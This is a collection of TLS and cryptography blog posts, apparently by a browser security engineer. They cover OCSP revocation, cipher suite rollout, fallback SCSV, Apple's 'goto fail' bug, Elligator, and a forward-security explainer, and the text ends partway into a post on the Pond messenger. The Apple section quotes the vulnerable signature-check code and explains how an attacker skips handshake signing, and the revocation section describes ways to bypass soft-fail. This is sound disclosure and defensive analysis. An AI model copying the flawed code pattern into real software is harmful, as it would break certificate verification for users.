Certificates bind a public key and an identity (commonly a DNS name) together. Because of the way the incentives work out, they are typically issued for a period of several years. But events occur and sometimes the binding between public key and name that the certificate asserts becomes invalid during that time. In the recent cases, people who ran a server that was affected by the heartbeat bug are worried that their private key might have been obtained by someone else and so they want to invalidate the old binding, and bind to a new public key. However, the old certificates are still valid and so someone who had obtained that private key could still use them.

Revocation is the process of invalidating a certificate before its expiry date. All certificates include a statement that essentially says “please phone the following number to check that this certificate has not been revoked”. The term online revocation checking refers to the process of making that phone call. It's not actually a phone call, of course, rather browsers and other clients can use a protocol called OCSP to check the status of a certificate. OCSP supplies a signed statement that says that the certificate is still valid (or not) and, critically, the OCSP statement itself is valid for a much shorter period of time, typically a few days.

The critical question is what to do in the event that you can't get an answer about a certificate's revocation status. If you reject certificates when you can't get an answer, that's called hard-fail. If you accept certificates when you can't get an answer that's called soft-fail.

Everyone does soft-fail for a number of reasons on top of the general principle that single points of failure should be avoided. Firstly, the Internet is a noisy place and sometimes you can't get through to OCSP servers for some reason. If you fail in those cases then the level of random errors increases. Also, captive portals (e.g. hotel WiFi networks where you have to “login” before you can use the Internet) frequently use HTTPS (and thus require certificates) but don't allow you to access OCSP servers. Lastly, if everyone did hard-fail then taking down an OCSP service would be sufficient to take down lots of Internet sites. That would mean that DDoS attackers would turn their attention to them, greatly increasing the costs of running them and it's unclear whether the CAs (who pay those costs) could afford it. (And the disruption is likely to be significant while they figure that out.)

So soft-fail is the only viable answer but it has a problem: it's completely useless. But that's not immediately obvious so we have to consider a few cases:

If you're worried about an attacker using a revoked certificate then the attacker first must be able to intercept your traffic to the site in question. (If they can't even intercept the traffic then you didn't need any authentication to protect it from them in the first place.) Most of the time, such an attacker is near you. For example, they might be running a fake WiFi access point, or maybe they're at an ISP. In these cases the important fact is that the attacker can intercept all your traffic, including OCSP traffic. Thus they can block OCSP lookups and soft-fail behaviour means that a revoked certificate will be accepted.

The next class of attacker might be a state-level attacker. For example, Syria trying to intercept Facebook connections. These attackers might not be physically close, but they can still intercept all your traffic because they control the cables going into and out of a country. Thus, the same reasoning applies.

We're left with cases where the attacker can only intercept traffic between a user and a website, but not between the user and the OCSP service. The attacker could be close to the website's servers and thus able to intercept all traffic to that site, but not anything else. More likely, the attacker might be able to perform a DNS hijacking: they persuade a DNS registrar to change the mapping between a domain (example.com) and its IP address(es) and thus direct the site's traffic to themselves. In these cases, soft-fail still doesn't work, although the reasoning is more complex:

Firstly, the attacker can use OCSP stapling to include the OCSP response with the revoked certificate. Because OCSP responses are generally valid for some number of days, they can store one from before the certificate was revoked and use it for as long as it's valid for. DNS hijackings are generally noticed and corrected faster than the OCSP response will expire. (On top of that, you need to worry about browser cache poisoning, but I'm not going to get into that.)

Secondly, and more fundamentally, when issuing certificates a CA validates ownership of a domain by sending an email, or looking for a specially formed page on the site. If the attacker is controlling the site, they can get new certificates issued. The original owners might revoke the certificates that they know about, but it doesn't matter because the attacker is using different ones. The true owners could try contacting CAs, convincing them that they are the true owners and get other certificates revoked, but if the attacker still has control of the site, they can hop from CA to CA getting certificates. (And they will have the full OCSP validity period to use after each revocation.) That circus could go on for weeks and weeks.

That's why I claim that online revocation checking is useless - because it doesn't stop attacks. Turning it on does nothing but slow things down. You can tell when something is security theater because you need some absurdly specific situation in order for it to be useful.

So, for a couple of years now, Chrome hasn't done these useless checks by default in most cases. Rather, we have tried a different mechanism. We compile daily lists of some high-value revocations and use Chrome's auto-update mechanism to push them to Chrome installations. It's called the CRLSet and it's not complete, nor big enough to cope with large numbers of revocations, but it allows us to react quickly to situations like Diginotar and ANSSI. It's certainly not perfect, but it's more than many other browsers do.

A powerful attacker may be able to block a user from receiving CRLSet updates if they can intercept all of that user's traffic for long periods of time. But that's a pretty fundamental limit; we can only respond to any Chrome issue, including security bugs, by pushing updates.

The original hope with CRLSets was that we could get revocations categorised into important and administrative and push only the important ones. (Administrative revocations occur when a certificate is changed with no reason to suspect that any key compromise occurred.) Sadly, that mostly hasn't happened. Perhaps we need to consider a system that can handle much larger numbers of revocations, but the data in that case is likely to be two orders of magnitude larger and it's very unlikely that the current CRLSet design is still optimal when the goal moves that far. It's also a lot of data for every user to be downloading and perhaps efforts would be better spent elsewhere. It's still the case that an attacker that can intercept traffic can easily perform an SSL Stripping attack on most sites; they hardly need to fight revoked certificates.

In order to end on a positive note, I'll mention a case where online revocation checking does work, and another, possible way to solve the revocation problem for browsers.

The arguments above started with the point that an attacker using a revoked certificate first needs to be able to intercept traffic between the victim and the site. That's true for browsers, but it's not true for code-signing. In the case where you're checking the signature on a program or document that could be distributed via, say, email, then soft-fail is still valuable. That's because it increases the costs on the attacker substantially: they need to go from being able to email you to needing to be able to intercept OCSP checks. In these cases, online revocation checking makes sense.

If we want a scalable solution to the revocation problem then it's probably going to come in the form of short-lived certificates or something like OCSP Must Staple. Recall that the original problem stems from the fact that certificates are valid for years. If they were only valid for days then revocation would take care of itself. (This is the approach taken by DNSSEC.) For complex reasons, it might be easier to deploy that by having certificates that are valid for years, but include a marker in them that indicates that an OCSP response must be provided along with the certificate. The OCSP response is then only valid for a few days and the effect is the same (although less efficient).

TLS Triple Handshakes

Today, the TLS WG mailing list meeting received a note about the work of Karthikeyan Bhargavan, Antoine Delignat-Lavaud, Cedric Fournet, Alfredo Pironti and Pierre-Yves Strub on triple handshake attacks against TLS. This is more complex than just a duplicated goto and I'm not going to try and reproduce their explanation here. Instead, I'll link to their site again, which also includes a copy of their paper.

In short, the TLS handshake hashes in too little information, and always has. Because of that it's possible to synchronise the state of two TLS sessions in a way that breaks assumptions made in the rest of the protocol.

I'd like to thank the researchers for doing a very good job of disclosing this. The note today even included a draft for fixing the TLS key derivation to include all the needed information to stop this attack, and it'll be presented at the WG meeting tomorrow.

In the mean time, people shouldn't panic. The impact of this attack is limited to sites that use TLS client-certificate authentication with renegotiation, and protocols that depend on channel binding. The vast majority of users have never used client certificates.

The client-certificate issues can be fixed with a unilateral, client change to be stricter about verifying certificates during a renegotiation, as suggested by the authors. I've included an image, below, that is loaded over an HTTPS connection that renegotiates with unrelated certificates before returning the image data. Hopefully the image below is broken. If not, then it likely will be soon because of a browser update. (I took the server down.)

Protocols that depend on channel binding (including ChannelID) need other changes. Ideally, the proposed update to the master-secret computation will be finalised and implemented. (For ChannelID, we have already updated the protocol to include a change similar to the proposed draft.)

It's likely that there are still concrete problems to be found because of the channel-binding break. Hopefully with today's greater publicity people can start to find them.

TLS Symmetric Crypto

At this time last year, the TLS world was mostly running on RC4-SHA and AES-CBC. The Lucky 13 attack against CBC in TLS had just been published and I had spent most of January writing patches for OpenSSL and NSS to implement constant-time CBC decoding. The RC4 biases paper is still a couple of week away, but it's already clear that both these major TLS cipher suite families are finished and need replacing. (The question of which is worse is complicated.)

Here's Chrome's view of TLS by number of TLS connections from around this time (very minor cipher suite families were omitted):

Cipher suite familyPercentage of TLS connections made by Chrome
RC4-MD52.8%
RC4-SHA148.9%
AES128-SHA11.2%
AES256-SHA146.3%

A whole bunch of people, myself included, have been working to address that since.

AES-GCM was already standardised, implemented in OpenSSL and has hardware support in Intel chips, so Wan-Teh Chang and I started to implement it in NSS, although first we had to implement TLS 1.2, on which it depends. That went out in Chrome 30 and 31. Brian Smith (and probably others!) at Mozilla shipped that code in Firefox also, with Firefox 27.

AES-GCM is great if you have hardware support for it: Haswell chips can do it in just about 1 cycle/byte. However, it's very much a hardware orientated algorithm and it's very difficult to implement securely in software with reasonable speed. Also, since TLS has all the infrastructure for cipher suite negotiation already, it's nice to have a backup in the wings should it be needed.

So we implemented ChaCha20-Poly1305 for TLS in NSS and OpenSSL. (Thanks to Elie Bursztein for doing a first pass in OpenSSL.) This is an AEAD made up of primitives from djb and we're using implementations from djb, Andrew M, Ted Krovetz and Peter Schwabe. Although it can't beat AES-GCM when AES-GCM has dedicated hardware, I suspect there will be lots of chips for a long time that don't have such hardware. Certainly most mobile phones at the moment don't (although AArch64 is coming).

Here's an example of the difference in speeds:

ChipAES-128-GCM speedChaCha20-Poly1305 speed
OMAP 446024.1 MB/s75.3 MB/s
Snapdragon S4 Pro41.5 MB/s130.9 MB/s
Sandy Bridge Xeon (AESNI)900 MB/s500 MB/s

(The AES-128-GCM implementation is from OpenSSL 1.0.1f. Note, ChaCha20 is a 256-bit cipher and AES-128 obviously isn't.)

There's also an annoying niggle with AES-GCM in TLS because the spec says that records have an eight byte, explicit nonce. Being an AEAD, the nonce is required to be unique for a given key. Since an eight-byte value is too small to pick at random with a sufficiently low collision probability, the only safe implementation is a counter. But TLS already has a suitable, implicit record sequence counter that has always been used to number records. So the explicit nonce is at best a waste of eight bytes per record, and possibly dangerous should anyone attempt to use random values with it. Thankfully, all the major implementations use a counter and I did a scan of the Alexa, top 200K sites to check that none are using random values - and none are. (Thanks to Dr Henson for pointing out that OpenSSL is using a counter, but with a random starting value.)

For ChaCha20-Poly1305 we can save 8 bytes of overhead per record by using the implicit sequence number for the nonce.

Cipher suite selection

Given the relative merits of AES-GCM and ChaCha20-Poly1305, we wish to use the former when hardware support is available and the latter otherwise. But TLS clients typically advertise a fixed preference list of cipher suites and TLS servers either respect it, or override the client's preferences with their own, fixed list. (E.g. Apache's SSLHonorCipherOrder directive.)

So, first, the client needs to alter its cipher suite preference list depending on whether it has AES-GCM hardware support - which Chrome now does. Second, servers that enforce their own preferences (which most large sites do) need a new concept of an equal-preference group: a set of cipher suites in the server's preference order which are all “equally good”. When choosing a cipher suite using the server preferences, the server finds its most preferable cipher suite that the client also supports and, if that is in an equal preference group, picks whichever member of the group is the client's most preferable. For example, Google servers have a cipher suite preference that includes AES-GCM and ChaCha20-Poly1305 cipher suites in an equal preference group at the top of the preference list. So if the client supports any cipher suite in that group, then the server will pick whichever was most preferable for the client.

The end result is that Chrome talking to Google uses AES-GCM if there's hardware support at the client and ChaCha20-Poly1305 otherwise.

After a year of work, let's see what Chrome's view of TLS is now:

Cipher suite familyPercentage of TLS connections made by Chrome
RC4-MD53.1%
RC4-SHA114.1%
AES128-SHA12.6%
AES256-SHA140.2%
AES128-GCM & ChaCha20-Poly130539.9%

What remains is standardisation work and getting the code out to the world for others. The ChaCha20-Poly1305 cipher suites are unlikely to survive the IETF without changes so we'll need to respin them at some point. As for getting the code out, I hope to have something to say about that in the coming months. Before then I don't recommend that anyone try to repurpose code from the Chromium repos - it is maintained with only Chromium in mind.

Fallbacks

Now that TLS's symmetric crypto is working better there's another, long-standing problem that needs to be addressed: TLS fallbacks. The new, AEAD cipher suites only work with TLS 1.2, which shouldn't be a problem because TLS has a secure negotiation mechanism. Sadly, browsers have a long history of doing TLS fallbacks: reconnecting with a lesser TLS version when a handshake fails. This is because there are lots of buggy HTTPS servers on the Internet that don't implement version negotiation correctly and fallback allows them to continue to work. (It also promotes buggy implementations by making them appear to function; but fallback was common before Chrome even existed so we didn't really have a choice.)

Chrome now has a four stage fallback: TLS 1.2, 1.1, 1.0 then SSLv3. The problem is that fallback can be triggered by an attacker injecting TCP packets and it reduces the security level of the connection. In the TLS 1.2 to 1.1 fallback, AES-GCM and ChaCha20-Poly1305 are lost. In the TLS 1.0 to SSLv3 fallback, all elliptic curve support, and thus ECDHE, disappears. If we're going to depend on these new cipher suites then we cannot allow attackers to do this, but we also cannot break all the buggy servers.

So, with Chrome 33, we implemented a fallback SCSV. This involves adding a pseudo-cipher suite in the client's handshake that indicates when the client is trying a fallback connection. If an updated server sees this pseudo-cipher suite, and the connection is not using the highest TLS version supported by the server, then it replies with an error. This is essentially duplicating the version negotiation in the cipher suite list, which isn't pretty, but the reality is that the cipher suite list still works but the primary version negotiation is rusted over with bugs.

With this in place (and also implemented on Google servers) we can actually depend on having TLS 1.2, at least between Chrome and Google (for now).

Bugs

Few rollouts are trouble free and Chrome 33 certainly wasn't, although most of the problems were because of a completely different change.

Firstly, ChaCha20-Poly1305 is running at reduced speed on ARM because early-revision, S3 phones have a problem that causes the NEON, Poly1305 code to sometimes calculate the wrong result. (It's not clear if it's the MSM8960 chip or the power supply in the phone.) Of course, it works well enough to run the unit tests successfully because otherwise I wouldn't have needed two solid days to pin it down. Future releases will need to run a self-test to gather data about which revisions have the problem and then we can selectively disable the fast-path code on those devices. Until then, it's disabled everywhere. (Even so, ChaCha20-Poly1305 is still much faster than AES-GCM on ARM.)

But it was the F5 workaround that caused most of the headaches. Older (but common) firmware revisions of F5 devices hang the connection when the ClientHello is longer than 255 bytes. This appeared to be a major issue because it meant that we couldn't add things to the ClientHello without breaking lots of big sites that use F5 devices. After a plea and a discussion on the TLS list, an engineer from F5 explained that it was just handshake messages between 256 and 511 bytes in length that caused the issue. That suggested an obvious solution: pad the handshake message so that it doesn't fall into the troublesome size range.

Chrome 33 padded all ClientHellos to 512 bytes, which broke at least two “anti-virus” products that perform local MITM of TLS connections on Windows and at least one “filtering” device that doesn't do MITM, but killed the TCP connections anyway. All made the assumption that the ClientHello will never be longer than some tiny amount. In the firewall case, the fallback SCSV stopped a fallback to SSLv3 that would otherwise have hidden the problem by removing the padding.

Thankfully, two of the three vendors have acted quickly to address the issue. The last, Kaspersky, has known about these sorts of problems for 18 months now (since Chrome tried to deploy TLS 1.1 and hit a similar issue) but, thankfully, doesn't enable MITM mode by default.

Overall, it looks like the changes are viable. Hopefully the path will now be easier for any other clients that wish to do the same.

Apple's SSL/TLS bug

Yesterday, Apple pushed a rather spooky security update for iOS that suggested that something was horribly wrong with SSL/TLS in iOS but gave no details. Since the answer is at the top of the Hacker News thread, I guess the cat's out of the bag already and we're into the misinformation-quashing stage now.

So here's the Apple bug:

static OSStatus
SSLVerifySignedServerKeyExchange(SSLContext *ctx, bool isRsa, SSLBuffer signedParams,
                                 uint8_t *signature, UInt16 signatureLen)
{
	OSStatus        err;
	...

	if ((err = SSLHashSHA1.update(&hashCtx, &serverRandom)) != 0)
		goto fail;
	if ((err = SSLHashSHA1.update(&hashCtx, &signedParams)) != 0)
		goto fail;
		goto fail;
	if ((err = SSLHashSHA1.final(&hashCtx, &hashOut)) != 0)
		goto fail;
	...

fail:
	SSLFreeBuffer(&signedHashes);
	SSLFreeBuffer(&hashCtx);
	return err;
}

(Quoted from Apple's published source code.)

Note the two goto fail lines in a row. The first one is correctly bound to the if statement but the second, despite the indentation, isn't conditional at all. The code will always jump to the end from that second goto, err will contain a successful value because the SHA1 update operation was successful and so the signature verification will never fail.

This signature verification is checking the signature in a ServerKeyExchange message. This is used in DHE and ECDHE ciphersuites to communicate the ephemeral key for the connection. The server is saying “here's the ephemeral key and here's a signature, from my certificate, so you know that it's from me”. Now, if the link between the ephemeral key and the certificate chain is broken, then everything falls apart. It's possible to send a correct certificate chain to the client, but sign the handshake with the wrong private key, or not sign it at all! There's no proof that the server possesses the private key matching the public key in its certificate.

Since this is in SecureTransport, it affects iOS from some point prior to 7.0.6 (I confirmed on 7.0.4) and also OS X prior to 10.9.2 (confirmed on 10.9.1). It affects anything that uses SecureTransport, which is most software on those platforms although not Chrome and Firefox, which both use NSS for SSL/TLS. However, that doesn't mean very much if, say, the software update systems on your machine might be using SecureTransport.

I coded up a very quick test site at https://www.imperialviolet.org:1266. Note the port number (which is the CVE number), the normal site is running on port 443 and that is expected to work. On port 1266 the server is sending the same certificates but signing with a completely different key. If you can load an HTTPS site on port 1266 then you have this bug.

Because the certificate chain is correct and it's the link from the handshake to that chain which is broken, I don't believe any sort of certificate pinning would have stopped this. Also, this doesn't only affect sites using DHE or ECDHE ciphersuites - the attacker gets to choose the ciphersuite in this case and will choose the one that works for them.

Also, this doesn't affect TLS 1.2 because there's a different function for verifying the different ServerKeyExchange message in TLS 1.2. But, again, the attacker can choose any version that the client will accept. But if the client only enables TLS 1.2 then it appears that would workaround this issue. Likewise, if the client only enabled the plain, RSA ciphersuites then there's no ServerKeyExchange and that should also work around this issue. (Of the two, the former workaround is much more preferable.)

Based on my test site, both iOS 7.0.6 and OS X 10.9.2 fix the issue. (Update: it looks like the bug was introduced in 10.9 for OS X but existed in at least some versions of iOS 6. iOS 6.1.6 was released yesterday to fix it.)

This sort of subtle bug deep in the code is a nightmare. I believe that it's just a mistake and I feel very bad for whoever might have slipped in an editor and created it.

Here's a stripped down that code with the same issue:

extern int f();

int g() {
	int ret = 1;

	goto out;
	ret = f();

out:
	return ret;
}

If I compile with -Wall (enable all warnings), neither GCC 4.8.2 or Clang 3.3 from Xcode make a peep about the dead code. That's surprising to me. A better warning could have stopped this but perhaps the false positive rate is too high over real codebases? (Thanks to Peter Nelson for pointing out the Clang does have -Wunreachable-code to warn about this, but it's not in -Wall.)

Maybe the coding style contributed to this by allowing ifs without braces, but one can have incorrect indentation with braces too, so that doesn't seem terribly convincing to me.

A test case could have caught this, but it's difficult because it's so deep into the handshake. One needs to write a completely separate TLS stack, with lots of options for sending invalid handshakes. In Chromium we have a patched version of TLSLite to do this sort of thing but I cannot recall that we have a test case for exactly this. (Sounds like I know what my Monday morning involves if not.)

Code review can be effective against these sorts of bug. Not just auditing, but review of each change as it goes in. I've no idea what the code review culture is like at Apple but I strongly believe that my colleagues, Wan-Teh or Ryan Sleevi, would have caught it had I slipped up like this. Although not everyone can be blessed with folks like them.

Lastly, there was a lot of discussion yesterday that Apple missed checking the hostname in the certificate. It's true that curl on the OS X command line oddly accepts HTTPS connections to IP addresses when the IP address isn't in the certificate, but I can't find that there's anything more than that and Safari doesn't have that problem.

Implementing Elligator for Curve25519

There are some situations where you would like to encode a point on an elliptic curve in such a way that it appears to be a uniform, random string. This comes up in some password authenticated key exchange systems, where one doesn't want to leak any bits of the password. It also comes up in protocols that are trying to be completely uniform so as to make life hard for network censors.

For the purposes of this post, I'm only going to be considering Curve25519. Recall that Curve25519 is the set of points (u,v) where v2 = u3 + 486662x2 + u and u and v are taken from GF(q=2255-19). Curve25519 works with a Montgomery ladder construction and thus only exchanges v coordinates. So, when sending a v coordinate there are two ways that an attacker can distinguish it from a random string:

Firstly, since the field is only 255 bits, the 256th bit is always zero. Thus if an attacker sees a series of 32-byte strings where the top bit of the last byte is always zero, then they can be confident that they are not random strings. This is easy to fix however, just XOR in a random bit and mask it out before processing.

Secondly, the attacker can assume that a 32-byte string is a v coordinate and check whether v3 + 486662x2 + v is a square. This will always be true if the strings are v coordinates, by the curve equation, but will only be true 50% of the time otherwise. This problem is a lot harder to fix.

Thankfully; djb, Tanja Lange, Mike Hamburg and Anna Krasnova have published Elligator [paper]. In that paper they present two maps from elliptic curve points to uniform, random strings and you should, at least, read the introduction to the paper, which contains much more detail on the use cases and previous work.

Elligator 2 is suitable for Curve25519 and there are some hints about an implementation in section 5.5. However, this blog post contains my own notes about implementing each direction of the map with only a couple of exponentiations. You may need to read the paper first before the following makes much sense.

I'll start with the inverse map, because that's what's used during key-generation. Throughout I'll write (x, y) for affine coordinates on the twisted, Edwards isomorphism of Curve25519, as defined for Ed25519; (u,v) for affine coordinates on Curve25519 itself; and X, Y, Z for extended coordinates on the twisted, Edwards curve.

The inverse map, ψ-1, takes a point on the curve with the following limitations and produces a uniform, representative value:

  1. u ≠ -A. (The value A is a parameter of Curve25519 and has the value 486662.)
  2. -2u(u + A) is a square

Since we're generating the points randomly, I'm going to ignore the first condition because it happens far less frequently than malfunctions in the CPU instructions that I might use to detect it.

The second condition excludes about half the points on the curve: these points don't have any representation as a uniform string. When generating a key we need to detect and restart if we happen upon one of those points. (When working in the other direction, ψ(r) = ψ(-r), which explains why half the image is missing.)

If the point is in the image of the map then the uniform string representation, r, is defined by:

(If you can't see the equation, you need a browser that can handle inline SVG.)

So our key generation function is going to take a private key and either produce nothing (if the resulting point isn't in the image of the map), or produce a public key and the uniform representation of it. We're working with Curve25519, so the public key, if any, will exactly match the result of the scalar_base_mult operation on Curve25519.

Since I happened to have the ref10 code from Ed25519 close to hand, we'll be calculating the scalar multiplication on the twisted, Edwards isomorphism of Curve25519 that Ed25519 uses. I've discussed that before but, in short, it allows for the use of precomputed tables and so is faster than scalar_base_mult with the Curve25519 code.

The result of the scalar multiplication of the base point with the private key is a point on the twisted, Edwards curve in extended coordinates: (X : Y : Z), where x = X/Z and y = Y/Z and where (x, y) are the affine coordinates on the Edwards curve. In order to convert a point on the Edwards curve to a point on Curve25519, we evaluate:

This is looking quite expensive: first we have to convert from extended coordinates on the Edwards curve to affine, then to affine on Curve25519. In finite fields, inversions (i.e. division) are very expensive because they are done by raising the divisor to the power of q-2 (where q=2255-19). Compared to such large exponentiations, multiplications and additions are almost free.

But, we can merge all those inversions and do the whole conversion with just one. First, substitute the extended coordinate conversion: x = X/Z, y = Y/Z.

image/svg+xml

By calculating just 1/(X(Y-Z)), we can get (u,v). The reciprocal can be used directly to calculate v and then multiplied by X to calculate u.

What remains is to check whether -2u(u + A) is a square and then to calculate the correct square root. Happily, we can calculate all that (including both square roots because we want to be constant-time), with a single exponentiation.

Square roots are defined in the standard way for finite fields where q ≅ 5 mod 8:

Let's consider the square roots first. Both have a common, constant term of (-1/2) which we can ignore for now. With that gone, both are fractions that we need to raise to (q+3)/8. Section 5 of the Ed25519 paper contains a trick for merging the inversion with the exponentiation:

But let's see what else we can do with the c value.

So c7 gives us the variable part of the other square root without another large exponentiation! It only remains to multiply in the constant term of (-1/2)(q+3)/8 to each and then, for each, test whether the square root of -1 needs to be multiplied. For the first square root, for example, we should have that r2 = -u/(2(u+A)) thus 2r2(u+A)+u should be zero. If not, then we need to multiply r by sqrt(-1).

Lastly, we need to check that the point is in the image of the map at all! (An implementation may want to do this sooner so that failures can be rejected faster.) For this we need to check that -2u(u + A) is a square. We use the fact that an element of the field is a non-zero square iff raising it to (q-1)/2 results in one. Thus we need to calculate (-2)(q-1)/2(u(u+A))(q-1)/2. The first part is just a constant, but the latter would be an expensive, large exponentiation, if not for c again:

With that result we can pick the correct square root (and in constant time, of course!)

The map in the forward direction

In the forward direction, the map takes a uniform, representative value and produces a public key, which is the x coordinate of a Curve25519 point in this context: ψ(r) = u. (Remember that the affine coordinates on Curve25519 are written (u,v) here.) This is much simpler than the reverse direction, although, as best I can tell, equally expensive. Given a value, r, one can calculate the value u with:

This requires one inversion to calculate d and another, large exponentiation to calculate ε. The resulting u value will match the output of the key generation stage which, in turn, matches the value that running scalar_base_mult from the Curve25519 code would have produced for the same private key.

Note that the Elligator software page says that GMP can compute the Legendre symbol (the ε calculation) in only 9000 cycles, so I'm clearly missing some implementation trick somewhere. Additionally, the Elligator paper raises the possibility of implementing the inversions with a blinded, Euclidean algorithm. That would certainly be faster but I'm not comfortable that I know how to do that safely, so I'm sticking with exponentiation here.

Implementation

I've a constant-time, pure Go implementation, based on the field operations from the pure-C, SUPERCOP, Ed25519 code. The field operations have been ported pretty mechanically from the C code, so it's hardly pretty Go code, but it seems to work.

On my, 3.1GHz, Ivy Bridge system (with TurboBoost enabled) the key generation takes 155µs and the forward map operation takes 28µs. (But remember that half of the key generations will fail, so ~double that time.)

I have not carefully reviewed the code, so beware. There are also some non-obvious concerns when using Elligator: for example, if you are hiding a uniform representative in an nonce field then the attacker might assume that it's a field element, negate it and let the connection continue. In a normal protocol, altering the nonce usually leads to a handshake failure but negating an Elligator representative is a no-op. If the connection continues then the attacker can be pretty sure that the value wasn't really random. So care is required.

So if you think that Elligator might be right for you, consult your cryptographer.

Forward security for journalists

A number of journalists have been writing stories about forward security recently. Some of them ended up talking to me and I completely failed to come up with a good metaphor that didn't cause more problems than it solved. Eventually I wrote the following as an introduction to forward security for journalists. It's deeply simplified but I think it captures the broad strokes.

It remains unclear whether anyone actually came away with a better understanding after reading it, however.

A great many metaphors have been mangled, and analogies tortured, trying to explain what forward security is. But, fundamentally, it doesn't involve anything more complex than high-school math and anybody should be able to understand it. So this document attempts to describe what forward security is.

In the 1970s, cryptography was purely the concern of the military. The NSA existed (unofficially) and believed that it was the sole, legitimate center of cryptographic knowledge in the US. In this environment, Whitfield Diffie set out from MIT across the country to try and gather up what scraps of cryptography has escaped into the public realm. If we omit huge amounts of detail (see Steven Levy's book, “Crypto” for the details) we can say that he ended up at Stanford with a revolutionary idea in his head: public key cryptography.

Up to that point, cryptography had involved secret keys that both the sender and receiver were in possession of. Diffie wondered about a system where one could publish part of a key (the public part) and keep another part of the key private. However, he didn't have any concrete implementation of this.

At Stanford he found Martin Hellman and, together they published New Directions in Cryptography (1976), which contained the Diffie-Hellman key-agreement algorithm. This is possibly the most significant work in cryptographic history and is still a core algorithm today. (Later we learnt that a researcher at GCHQ had discovered the idea a few years earlier. But GCHQ didn't do anything with it and never published it.)

We'll need modular arithmetic, which is like working with times. What's 8pm plus five hours? One o'clock. Because 8+5=13 and 13 divided by 12 has a remainder of one. Likewise, 8pm plus 17 hours is still one o'clock, because adding multiples of 12 doesn't make any difference to a clock. We'll be using the same idea, but with numbers (called the modulus) other than 12.

To explain Diffie-Hellman we'll work modulo 11. So 5+10=4 now, because 15 divided by 11 has a remainder of 4.

Next, exponentiation: 23 means 2, multiplied by itself three times. So 23=2×2×2=8. Now we have everything that we need to implement Diffie-Hellman.

In classic, cryptographic tradition we'll imagine two parties and we'll call them Alice and Bob. Alice generates a random number between 1 and 9 and calls it a. This is her private key; let's say that it's five. Alice calculates her public key as A=2a=25=32=10 mod 11.

Bob does the same but his private key is called b and his public key is B. Let's say that his private key is six which means that B=2b=26=64=9 mod 11.

Alice and Bob can freely publish A and B because, given them, no other party can work backwards and calculate their private keys. Well, in this case they can because we're using a toy example with a tiny modulus. A real modulus has over 500 digits. Then it's not possible with any current computer.

Once Alice has Bob's public key, or vice-versa, she can perform key-agreement. She combines her private key with Bob's public key like this: Ba=95=59049=1 mod 11. Bob can combine his private key with Alice's public key in the same way: Ab=106=1000000=1 mod 11. Both Alice and Bob arrived at the same, shared value (one) which nobody else can calculate. And without exchanging any secret information!

This was a huge breakthrough but it still left something to be desired: signatures. It seemed that it would be very useful for Alice to be able to calculate some function of a message that could be broadcast and would serve as a signature. So it had to be something that only Alice (or, rather, the entity holding the private part of Alice's public key) could have generated. Diffie-Hellman doesn't provide this.

In 1977, three researchers at MIT, Rivest, Shamir and Adleman, produced such a scheme. Now it's called by their initials: RSA. Again, the basics are high-school math.

We'll be working with modular arithmetic again but this time it'll be modulo the product of two primes. Like the example above, the numbers involved are usually huge, but we're going to use tiny numbers for the purposes of the examples.

So our two primes will be p=11 and q=17. This will serve as Alice's RSA private key. In order to calculate an RSA public key, one calculates n=11×17=187.

The core of RSA is that, when working modulo 187, it's very easy to calculate the cube of a number. But, unless you know that 187=11×17, it's very difficult to calculate the cube root of a number. Let's say that our message is 15. The cube is easy: 153=3375=9 mod 187. But to calculate the cube root you need to calculate the modular inverse of 3 and (p-1)(q-1)=10×16=160. We're getting a little past high-school math here so trust me that it's 107. By calculating 9107 mod 187 we find that we get our original number again: 15.

Think about what this means. If Bob knows that Alice's public key is 187, he can cube a message and send it to Alice and only Alice can calculate the cube root and recover the message. Also, if Alice starts with a message, she can calculate the cube root of it and publish that. Everyone else can be convinced that only Alice could have calculated the cube root of the message and so that functions as a digital signature of the message!

Now we have everything that we need to understand forward security so hang on while we wrap it all up.

RSA and Diffie-Hellman are both too slow to use for large amounts of data. Bulk data transfer uses secret-key cryptography: the old style cryptography where both sides need to know the secret key in order to process the ciphertext. But, in order to get the secret key to the other party, RSA or Diffie-Hellman is used.

Traditional HTTPS has the browser use RSA to transmit a secret key to the server. The browser picks a random, secret key, cubes it modulo the server's RSA modulus and sends it to the server. Only the server knows the two numbers that, multiplied together, equal its modulus so only the server can calculate the cube root and get the secret key for the connection.

However, if anyone were to record the HTTPS connection and later learn those two numbers (called factors) then they can retrospectively decrypt the recorded connections. They can also watch new connections to the server and decrypt those because they can calculate cube roots just as well as the real server can.

With forward security, the method of establishing the secret key for the connection is changed. When a client connects, the server generates a brand new Diffie-Hellman private key just for that connection. (It's called the ephemeral private key.) Then the server calculates its Diffie-Hellman public key (by 2a mod m, remember?) signs the public key with its RSA key (by calculating the cube root of it, modulo its RSA modulus) and sends all that to the browser. The browser verifies the signature (by cubing it and checking that the result equals the public key) and then generates its own Diffie-Hellman private and public keys. Now, the client has the server's Diffie-Hellman public key, so it can combine it with its Diffie-Hellman private key and calculated the shared-secret. It sends its Diffie-Hellman public key to the server and the server ends up with the same, shared secret. That secret is used as the secret key for the connection.

The advantage here is that, should the server's, long-term, RSA private key be compromised in the future it isn't as bad. The confidentiality of the connections is protected by the Diffie-Hellman secrets which were generated fresh for the connection and destroyed immediately afterwards. Also, the attacker, even with the RSA private key cannot passively decrypt connections in real-time. The attacker has to impersonate the server, which is much more work.

That's why forward-secrecy is often written as DHE: it stands for Diffie-Hellman ephemeral. There's also ECDHE (Elliptic Curve, Diffie-Hellman ephemeral) which is the same idea in a more efficient mathematical structure.

Pond

It seems that secure messaging projects are all the rage right now. Heck, Matthew Green is writing about it in the New Yorker this week!

One of my side-projects for a year or so has been about secure messaging. Of course, that means that I was working on it before it was cool (insert hipster emoticon here, :{D ) … but I'm slow because my side projects get very little time. (When I started, the subheading for the project was “How to better organise a discreet relationship with the Director of the CIA”, because that was the topical reference at the time. Oh, how things change.)

It's still not really ready, but the one year mark seemed like a good deadline to give myself to mention it in public. You should pay heed to the warning on the project page however. I did contact one, well known, security auditing company to see whether they would take a couple thousand dollars to spend a day on it, but they said that don't really do small projects and that I'd need to be talking 10-20 times that for a couple of weeks at least. So don't depend on it yet and don't be surprised if I've just broken it somehow by replacing the ratchet code. (Although, thanks, Trevor, for the design.)

But I fear that it's not going to make Matthew Green happy! It's certainly not a drop-in replacement for email. I spend my days working on small changes with a large multiplier, in my free time I choose to shift the balance completely the other way.

  • Ephemeral messages: although no software can prevent a recipient from making a copy of a message, it's the social norm and technical default in Pond that messages are erased after a week.
